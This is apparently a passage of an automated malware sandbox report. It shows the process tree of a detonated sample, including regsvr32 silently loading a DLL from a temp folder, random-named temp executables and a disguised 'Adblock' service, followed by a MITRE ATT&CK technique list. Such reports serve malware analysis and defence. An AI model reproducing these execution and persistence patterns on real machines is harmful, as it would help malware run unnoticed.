C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1144 -ip 1144
1⤵
PID:9940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1144 -ip 1144
1⤵
PID:3416

C:\Users\Admin\Programs\Adblock\DnsService.exe
C:\Users\Admin\Programs\Adblock\DnsService.exe
1⤵
PID:2908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2548 -ip 2548
1⤵
PID:31328

C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\EDC6.dll
1⤵
PID:55704

C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\EDC6.dll
2⤵
PID:55864

C:\Users\Admin\AppData\Local\Temp\EFCB.exe
C:\Users\Admin\AppData\Local\Temp\EFCB.exe
1⤵
PID:55928

C:\Users\Admin\AppData\Local\Temp\661.exe
C:\Users\Admin\AppData\Local\Temp\661.exe
1⤵
PID:56308

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

File Permissions Modification

T1222

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

System Information Discovery